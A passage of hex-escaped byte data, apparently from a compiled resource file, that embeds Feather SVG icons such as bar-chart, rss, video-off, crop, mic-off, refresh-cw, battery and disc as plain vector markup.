\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x75\x70\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\
\x20\x31\x34\x20\x32\x30\x20\x39\x20\x31\x35\x20\x34\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x34\x20\x32\x30\x76\x2d\x37\x61\x34\x20\x34\x20\
\x30\x20\x30\x20\x31\x20\x34\x2d\x34\x68\x31\x32\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x61\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x72\x2d\x63\
\x68\x61\x72\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\x22\
\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\x38\x22\
\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\
\x32\x30\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\
\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x69\x6d\
\x69\x7a\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\
\x20\x33\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x48\x33\x6d\x31\x38\x20\x30\x68\x2d\x33\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x33\x6d\x30\x20\x31\
\x38\x76\x2d\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x33\x4d\x33\x20\x31\x36\x68\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\x33\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x73\x73\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x31\x61\x39\
\x20\x39\x20\x30\x20\x30\x20\x31\x20\x39\x20\x39\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\
\x20\x34\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x31\x20\x31\
\x36\x20\x31\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x35\x22\x20\x63\x79\x3d\x22\
\x31\x39\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\
\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x7b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x69\x64\x65\x6f\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x31\x36\x76\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x32\x6d\x35\x2e\x36\x36\x20\x30\x48\x31\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\
\x33\x2e\x33\x34\x6c\x31\x20\x31\x4c\x32\x33\x20\x37\x76\x31\x30\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6c\x6c\
\x6f\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x37\x22\x20\x79\x3d\x22\
\x37\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x22\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x39\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\
\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x34\x22\x20\x79\x3d\x22\x37\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x2d\
\x33\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\
\x32\x30\x68\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x2e\x35\x20\x33\x2e\x35\x61\
\x32\x2e\x31\x32\x31\x20\x32\x2e\x31\x32\x31\x20\x30\x20\x30\x20\
\x31\x20\x33\x20\x33\x4c\x37\x20\x31\x39\x6c\x2d\x34\x20\x31\x20\
\x31\x2d\x34\x4c\x31\x36\x2e\x35\x20\x33\x2e\x35\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x36\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x6f\x70\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x31\x33\x20\
\x31\x4c\x36\x20\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x20\x32\x20\x32\x68\x31\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x20\x36\x2e\x31\x33\
\x4c\x31\x36\x20\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x20\x32\x76\x31\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xee\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x63\x2d\x6f\
\x66\x66\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\
\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\
\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x39\x76\x33\x61\x33\
\x20\x33\x20\x30\x20\x30\x20\x30\x20\x35\x2e\x31\x32\x20\x32\x2e\
\x31\x32\x4d\x31\x35\x20\x39\x2e\x33\x34\x56\x34\x61\x33\x20\x33\
\x20\x30\x20\x30\x20\x30\x2d\x35\x2e\x39\x34\x2d\x2e\x36\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x37\x20\x31\x36\x2e\x39\x35\x41\x37\x20\x37\x20\x30\x20\
\x30\x20\x31\x20\x35\x20\x31\x32\x76\x2d\x32\x6d\x31\x34\x20\x30\
\x76\x32\x61\x37\x20\x37\x20\x30\x20\x30\x20\x31\x2d\x2e\x31\x31\
\x20\x31\x2e\x32\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x39\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x32\x33\x22\x20\
\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x66\x72\x65\
\x73\x68\x2d\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x34\x20\x32\x33\
\x20\x31\x30\x20\x31\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x32\x30\x20\x31\x20\x31\
\x34\x20\x37\x20\x31\x34\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x2e\x35\
\x31\x20\x39\x61\x39\x20\x39\x20\x30\x20\x30\x20\x31\x20\x31\x34\
\x2e\x38\x35\x2d\x33\x2e\x33\x36\x4c\x32\x33\x20\x31\x30\x4d\x31\
\x20\x31\x34\x6c\x34\x2e\x36\x34\x20\x34\x2e\x33\x36\x41\x39\x20\
\x39\x20\x30\x20\x30\x20\x30\x20\x32\x30\x2e\x34\x39\x20\x31\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x74\x74\x65\
\x72\x79\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\
\x79\x3d\x22\x36\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x32\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\
\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\
\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x27\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x69\x73\x63\x22\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\
\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
